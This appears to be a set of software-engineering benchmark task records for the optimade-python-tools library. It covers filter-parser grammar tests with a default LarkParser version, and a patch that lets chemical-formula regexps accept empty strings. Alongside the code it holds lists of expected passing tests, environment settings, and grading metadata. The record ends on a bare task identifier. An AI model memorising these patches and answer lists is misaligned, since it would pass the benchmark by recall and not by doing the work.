TestParserV1_0_0: - version = (1, 0, 0) - variant = "default" + def test_parser_version(self): + assert self.parser.version == self.version + assert self.parser.variant == self.variant - @pytest.fixture(autouse=True) - def set_up(self): - self.parser = LarkParser(version=self.version, variant=self.variant) - def parse(self, inp): - 
return self.parser.parse(inp) +class TestParserV1_0_0(BaseTestFilterParser): + """Test cases for the v1.0.0 stable release grammar.""" + + version = (1, 0, 0) + variant = "default" def test_empty(self): assert isinstance(self.parse(" "), Tree) @@ -276,11 +262,34 @@ class TestParserV1_0_0: with pytest.raises(BadRequest): self.parse("NOTICE=val") # not valid property or value (NOTICE) - def test_parser_version(self): - assert self.parser.version == self.version - assert self.parser.variant == self.variant - def test_repr(self): - assert repr(self.parser) is not None - self.parser.parse('key="value"') - assert repr(self.parser) is not None +class TestParserV1_2_0(TestParserV1_0_0): + """Additional tests for the v1.2.0 development grammar. + + Should additionally pass all v1.0.0 tests. + + """ + + version = (1, 2, 0) + variant = "develop" + + def test_boolean_values(self): + assert isinstance( + self.parse("_exmpl_element_counts = TRUE"), + Tree, + ) + + assert isinstance( + self.parse("_exmpl_element_counts = FALSE"), + Tree, + ) + + assert isinstance( + self.parse("_exmpl_element_counts != FALSE"), + Tree, + ) + + assert isinstance( + self.parse("NOT _exmpl_element_counts = TRUE"), + Tree, + ) diff --git a/tests/filterparser/testfiles/parse_001.inp b/tests/filterparser/testfiles/parse_001.inp deleted file mode 100644 index e1587e24..00000000 --- a/tests/filterparser/testfiles/parse_001.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=te < st diff --git a/tests/filterparser/testfiles/parse_002.inp b/tests/filterparser/testfiles/parse_002.inp deleted file mode 100644 index 43c1f436..00000000 --- a/tests/filterparser/testfiles/parse_002.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=spacegroup="P2" diff --git a/tests/filterparser/testfiles/parse_003.inp b/tests/filterparser/testfiles/parse_003.inp deleted file mode 100644 index e2b5634d..00000000 --- a/tests/filterparser/testfiles/parse_003.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=_cod_cell_volume<100.0 diff --git 
a/tests/filterparser/testfiles/parse_004.inp b/tests/filterparser/testfiles/parse_004.inp deleted file mode 100644 index f1b1faef..00000000 --- a/tests/filterparser/testfiles/parse_004.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=_mp_bandgap > 5.0 AND _cod_molecular_weight < 350 diff --git a/tests/filterparser/testfiles/parse_005.inp b/tests/filterparser/testfiles/parse_005.inp deleted file mode 100644 index 4df410ea..00000000 --- a/tests/filterparser/testfiles/parse_005.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=_cod_melting_point<300 AND nelements=4 AND elements="Si,O2" diff --git a/tests/filterparser/testfiles/parse_006.inp b/tests/filterparser/testfiles/parse_006.inp deleted file mode 100644 index 62a22952..00000000 --- a/tests/filterparser/testfiles/parse_006.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=number=0.ANDnumber=.0ANDnumber=0.0ANDnumber=+0ANDNUMBER=-0ANDnumber=0e1ANDnumber=0e-1ANDnumber=0e+1 diff --git a/tests/filterparser/testfiles/parse_007.inp b/tests/filterparser/testfiles/parse_007.inp deleted file mode 100644 index 838d97fe..00000000 --- a/tests/filterparser/testfiles/parse_007.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=number=0.0.1 diff --git a/tests/filterparser/testfiles/parse_008.inp b/tests/filterparser/testfiles/parse_008.inp deleted file mode 100644 index 3090fa4a..00000000 --- a/tests/filterparser/testfiles/parse_008.inp +++ /dev/null @@ -1,1 +0,0 @@ - filter=key=value diff --git a/tests/filterparser/testfiles/parse_009.inp b/tests/filterparser/testfiles/parse_009.inp deleted file mode 100644 index bb24c9e6..00000000 --- a/tests/filterparser/testfiles/parse_009.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=author=" someone " diff --git a/tests/filterparser/testfiles/parse_010.inp b/tests/filterparser/testfiles/parse_010.inp deleted file mode 100644 index 1062b45a..00000000 --- a/tests/filterparser/testfiles/parse_010.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=NOTICE=val diff --git a/tests/filterparser/testfiles/parse_011.inp 
b/tests/filterparser/testfiles/parse_011.inp deleted file mode 100644 index c5b2c164..00000000 --- a/tests/filterparser/testfiles/parse_011.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=author="Sąžininga Žąsis" diff --git a/tests/filterparser/testfiles/parse_012.inp b/tests/filterparser/testfiles/parse_012.inp deleted file mode 100644 index 39143f62..00000000 --- a/tests/filterparser/testfiles/parse_012.inp +++ /dev/null @@ -1,2 +0,0 @@ -filter=author="Sąžininga Žąs -is" diff --git a/tests/filterparser/testfiles/parse_013.inp b/tests/filterparser/testfiles/parse_013.inp deleted file mode 100644 index a183d6b6..00000000 --- a/tests/filterparser/testfiles/parse_013.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter= a = 12345 AND b = +12 AND c = -34 AND d = 1.2 AND e = .2E7 AND f = -.2E+7 AND g = +10.01E-10 AND h = 6.03e23 AND i = .1E1 AND j = -.1e1 AND k = 1.e-12 AND l = -.1e-12 AND m = 1000000000.E1000000000 diff --git a/tests/filterparser/testfiles/parse_014.inp b/tests/filterparser/testfiles/parse_014.inp deleted file mode 100644 index 8019cd61..00000000 --- a/tests/filterparser/testfiles/parse_014.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=field = "!#$%&'()*+,-./:;<=>?@[]^`{|}~%" diff --git a/tests/filtertransformers/test_elasticsearch.py b/tests/filtertransformers/test_elasticsearch.py index bf72b729..b39618ee 100644 --- a/tests/filtertransformers/test_elasticsearch.py +++ b/tests/filtertransformers/test_elasticsearch.py @@ -13,7 +13,7 @@ from optimade.filtertransformers.elasticsearch import ( @pytest.fixture def parser(): - return LarkParser(version=(0, 10, 1)) + return LarkParser() @pytest.fixture
[ "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_special_cases", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_boolean_values" ]
[ "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_special_cases" ]
Method: LarkParser.__init__(self, version: Tuple[int, int, int] = None, variant: str = "default") Location: optimade/filterparser/lark_parser.py Inputs: - **version** (optional Tuple[int, int, int]): Desired grammar version; if omitted or None, the parser automatically selects the highest grammar version marked as default in the internal AVAILABLE_PARSERS mapping. - **variant** (optional str, default "default"): Name of the grammar variant to use (e.g., "default", "develop"). Outputs: - Constructs a `LarkParser` instance with attributes `self.version` set to the resolved version tuple and `self.variant` set to the supplied variant. - Raises `ParserError` if the resolved version is not present in `AVAILABLE_PARSERS`. Description: Initializes the filter parser, now allowing callers to omit the `version` argument and automatically obtain the latest default grammar. The `variant` argument remains optional and selects a specific grammar variant. This change is exercised in tests where `LarkParser()` is instantiated without arguments and its `version` and `variant` attributes are inspected.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/filterparser/test_filterparser.py tests/filtertransformers/test_elasticsearch.py" }
{ "num_modified_files": 3, "num_modified_lines": 27, "pr_author": "ml-evs", "pr_labels": [ "grammar: Concerns the Lark grammar files", "priority/low: Issue or PR with a consensus of low priority", "tests: Related to tests" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.95, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat", "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests removal of obsolete grammars, addition of a v1.2 development grammar with TRUE/FALSE tokens, and consolidation of tests so newer grammars inherit previous tests. The provided test patch implements exactly these changes: it deletes old test files, introduces a base test class, updates existing tests, and adds boolean-specific tests for the new grammar. 
There are no mismatches between the tests and the described requirements, nor any signs of hidden dependencies, naming expectations, external resources, or ambiguous specifications, so the task is clearly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b5169a88b9f8faa86e2c9c585ed058424405603f
2022-12-06 23:35:34
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#1428](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (4c18c23) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/a8c84c5f193e668eb8b5fc3f0db1d6a63796f472?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (a8c84c5) will **not change** coverage. > The diff coverage is `100.00%`. ```diff @@ Coverage Diff @@ ## master #1428 +/- ## ======================================= Coverage 91.43% 91.43% ======================================= Files 74 74 Lines 4392 4392 ======================================= Hits 4016 4016 Misses 376 376 ``` | Flag | Coverage Δ | | |---|---|---| | project | `91.43% <100.00%> (ø)` | | | validator | `91.53% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. 
| [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/models/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428/diff?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3V0aWxzLnB5) | `92.78% <100.00%> (ø)` | | Help us with your feedback. Take ten seconds to tell us [how you rate us](https://about.codecov.io/nps?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Have a feature suggestion? [Share it here.](https://app.codecov.io/gh/feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia)
materials-consortia__optimade-python-tools-1428
diff --git a/openapi/openapi.json b/openapi/openapi.json index 918a2965..180dce2b 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -3360,8 +3360,8 @@ }, "description": "If present MUST be a list of floats expressed in a.m.u.\nElements denoting vacancies MUST have masses equal to 0.", "x-optimade-queryable": "optional", - "x-optimade-support": "optional", - "x-optimade-unit": "a.m.u." + "x-optimade-unit": "a.m.u.", + "x-optimade-support": "optional" }, "original_name": { "title": "Original Name", @@ -3579,7 +3579,7 @@ }, "chemical_formula_reduced": { "title": "Chemical Formula Reduced", - "pattern": "^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", + "pattern": "(^$)|^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", "type": "string", "description": "The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers.\nThe proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n Intricate queries on formula components are instead suggested to be formulated using set-type filter operators on the multi valued `elements` and `elements_ratios` properties.\n - Element symbols MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in alphabetical order, followed by their integer chemical proportion number.\n - For structures with no partial occupation, the chemical proportion numbers are the smallest integers for which the chemical proportion is exactly correct.\n - For structures with partial occupation, the chemical proportion numbers are integers that within reasonable approximation indicate the correct chemical proportions. 
The precise details of how to perform the rounding is chosen by the API implementation.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2NaO\"`\n - `\"ClNa\"`\n - `\"CCaO3\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_reduced=\"H2NaO\"`.", "nullable": true, @@ -3588,7 +3588,7 @@ }, "chemical_formula_hill": { "title": "Chemical Formula Hill", - "pattern": "^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", + "pattern": "(^$)|^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", "type": "string", "description": "The chemical formula for a structure in [Hill form](https://dx.doi.org/10.1021/ja02046a005) with element symbols followed by integer chemical proportion numbers. The proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, only a subset of the filter features MAY be supported.\n - The overall scale factor of the chemical proportions is chosen such that the resulting values are integers that indicate the most chemically relevant unit of which the system is composed.\n For example, if the structure is a repeating unit cell with four hydrogens and four oxygens that represents two hydroperoxide molecules, `chemical_formula_hill` is `\"H2O2\"` (i.e., not `\"HO\"`, nor `\"H4O4\"`).\n - If the chemical insight needed to ascribe a Hill formula to the system is not present, the property MUST be handled as unset.\n - Element symbols MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in [Hill order](https://dx.doi.org/10.1021/ja02046a005), followed by their integer chemical proportion number.\n Hill order means: if carbon is present, it is placed first, and if also present, hydrogen is placed second.\n After that, all other elements are ordered alphabetically.\n If carbon 
is not present, all elements are ordered alphabetically.\n - If the system has sites with partial occupation and the total occupations of each element do not all sum up to integers, then the Hill formula SHOULD be handled as unset.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2O2\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_hill=\"H2O2\"`.", "x-optimade-queryable": "optional", @@ -3596,7 +3596,7 @@ }, "chemical_formula_anonymous": { "title": "Chemical Formula Anonymous", - "pattern": "^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", + "pattern": "(^$)|^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", "type": "string", "description": "The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n\n- **Examples**:\n - `\"A2B\"`\n - `\"A42B42C16D12E10F9G5\"`\n\n- **Querying**:\n - A filter that matches an exactly given formula is `chemical_formula_anonymous=\"A2B\"`.", "nullable": true, @@ -3640,8 +3640,8 @@ "description": "The three lattice vectors in Cartesian coordinates, in \u00e5ngstr\u00f6m (\u00c5).\n\n- **Type**: list of list of floats or unknown values.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST be a list of three vectors *a*, *b*, and *c*, where each of the 
vectors MUST BE a list of the vector's coordinates along the x, y, and z Cartesian coordinates.\n (Therefore, the first index runs over the three lattice vectors and the second index runs over the x, y, z Cartesian coordinates).\n - For databases that do not define an absolute Cartesian system (e.g., only defining the length and angles between vectors), the first lattice vector SHOULD be set along *x* and the second on the *xy*-plane.\n - MUST always contain three vectors of three coordinates each, independently of the elements of property `dimension_types`.\n The vectors SHOULD by convention be chosen so the determinant of the `lattice_vectors` matrix is different from zero.\n The vectors in the non-periodic directions have no significance beyond fulfilling these requirements.\n - The coordinates of the lattice vectors of non-periodic dimensions (i.e., those dimensions for which `dimension_types` is `0`) MAY be given as a list of all `null` values.\n If a lattice vector contains the value `null`, all coordinates of that lattice vector MUST be `null`.\n\n- **Examples**:\n - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 \u00c5; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`.", "nullable": true, "x-optimade-queryable": "optional", - "x-optimade-support": "should", - "x-optimade-unit": "\u00c5" + "x-optimade-unit": "\u00c5", + "x-optimade-support": "should" }, "cartesian_site_positions": { "title": "Cartesian Site Positions", @@ -3657,8 +3657,8 @@ "description": "Cartesian positions of each site in the structure.\nA site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property.\n\n- **Type**: list of list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported 
by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - It MUST be a list of length equal to the number of sites in the structure, where every element is a list of the three Cartesian coordinates of a site expressed as float values in the unit angstrom (\u00c5).\n - An entry MAY have multiple sites at the same Cartesian position (for a relevant use of this, see e.g., the property `assemblies`).\n\n- **Examples**:\n - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 \u00c5 away from the origin.", "nullable": true, "x-optimade-queryable": "optional", - "x-optimade-support": "should", - "x-optimade-unit": "\u00c5" + "x-optimade-unit": "\u00c5", + "x-optimade-support": "should" }, "nsites": { "title": "Nsites", diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 603ef08a..0474cdf9 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -231,7 +231,7 @@ def anonymous_element_generator(): ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) """ Returns the first 150 values of the anonymous element generator. """ -CHEMICAL_FORMULA_REGEXP = r"^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" +CHEMICAL_FORMULA_REGEXP = r"(^$)|^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" EXTRA_SYMBOLS = ["X", "vacancy"]
Allow empty strings through chemical formula regexp Last PR of the day, and one that can actually be reviewed and merged. After discussions in https://github.com/Materials-Consortia/OPTIMADE/issues/388, it seems that empty formulae should be allowed -- though we should wait until it is really resolved to merge this. This PR adjusted the regexp for this and moves the test case around. This has knock-on effects on open PRs in other repos (schemas, specification) that will need to be untangled at a later date.
**Title** Allow empty strings for chemical formula fields **Problem** The chemical formula properties reject empty strings, conflicting with the discussion that an empty formula should be a valid representation of “no formula”. This causes validation errors for legitimate responses. **Root Cause** The validation pattern for formula fields requires at least one element symbol, disallowing the empty string. **Fix / Expected Behavior** - Update the validation pattern to accept an empty string as a valid value. - Apply the same relaxed pattern to all three formula representations (reduced, Hill, anonymous). - Keep existing non‑empty formula strings validated against the original element‑symbol pattern. - Preserve nullability and other schema constraints unchanged. - Ensure the OpenAPI description reflects the updated pattern. **Risk & Validation** - Verify that all previously accepted formula strings still pass validation. - Add tests confirming that an empty string is accepted for each formula field. - Monitor downstream repositories for any schema compatibility issues that may arise.
1,428
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py index 955ecdee..bfeb3a1b 100644 --- a/tests/models/test_utils.py +++ b/tests/models/test_utils.py @@ -96,6 +96,7 @@ def test_formula_regexp(): "LiP5", "Jn7Qb4", # Regexp does not care about the actual existence of elements "A5B213CeD3E65F12G", + "", ) bad_formulae = ( @@ -106,7 +107,7 @@ def test_formula_regexp(): "6F7G", "A0Be2", "A1Be2", - "", + "A0B1", ) for formula in good_formulae:
[ "tests/models/test_utils.py::test_formula_regexp" ]
[ "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_utils.py" }
{ "num_modified_files": 2, "num_modified_lines": 10, "pr_author": "ml-evs", "pr_labels": [ "schema: Concerns the schema models", "models: For issues related to the pydantic models directly" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/Materials-Consortia/OPTIMADE/issues/388" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "edge_case_bug" ], "reason": null, "reasoning": "The issue requests that the chemical formula regular expression accept empty strings, moving '' into the set of valid formulas and treating \"A0B1\" as invalid. The provided test changes reflect exactly this requirement, and the code change updates CHEMICAL_FORMULA_REGEXP accordingly. No mismatches between test expectations and the stated goal are present, and there are no signals of missing specifications or external dependencies, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, 
"test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
7c8f9a63ff169fd1e1c90676e304ca9c99e5b939
2023-02-09 19:55:56
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#1509](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (57f5675) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7c8f9a63ff169fd1e1c90676e304ca9c99e5b939?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (7c8f9a6) will **increase** coverage by `0.01%`. > The diff coverage is `92.30%`. ```diff @@ Coverage Diff @@ ## master #1509 +/- ## ========================================== + Coverage 90.95% 90.97% +0.01% ========================================== Files 74 74 Lines 4411 4464 +53 ========================================== + Hits 4012 4061 +49 - Misses 399 403 +4 ``` | Flag | Coverage Δ | | |---|---|---| | project | `90.97% <92.30%> (+0.01%)` | :arrow_up: | | validator | `90.32% <92.30%> (+0.02%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. 
| [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/adapters/base.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvYmFzZS5weQ==) | `96.96% <83.33%> (-3.04%)` | :arrow_down: | | [optimade/models/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3V0aWxzLnB5) | `92.50% <91.66%> (-0.29%)` | :arrow_down: | | [optimade/adapters/structures/ase.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9hc2UucHk=) | `96.77% <92.59%> (-3.23%)` | :arrow_down: | | [optimade/adapters/structures/adapter.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9hZGFwdGVyLnB5) | `100.00% <100.00%> (ø)` | | | [optimade/adapters/structures/pymatgen.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9weW1hdGdlbi5weQ==) | `98.50% <100.00%> (-0.16%)` | :arrow_down: | | 
[optimade/adapters/structures/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy91dGlscy5weQ==) | `80.74% <100.00%> (+0.74%)` | :arrow_up: | | [optimade/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | `96.42% <100.00%> (+0.67%)` | :arrow_up: | Help us with your feedback. Take ten seconds to tell us [how you rate us](https://about.codecov.io/nps?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Have a feature suggestion? [Share it here.](https://app.codecov.io/gh/feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) ml-evs: Hi @JPBergsma, will merge this tomorrow, let me know if you want to have a second look first and I'll hold off.
materials-consortia__optimade-python-tools-1509
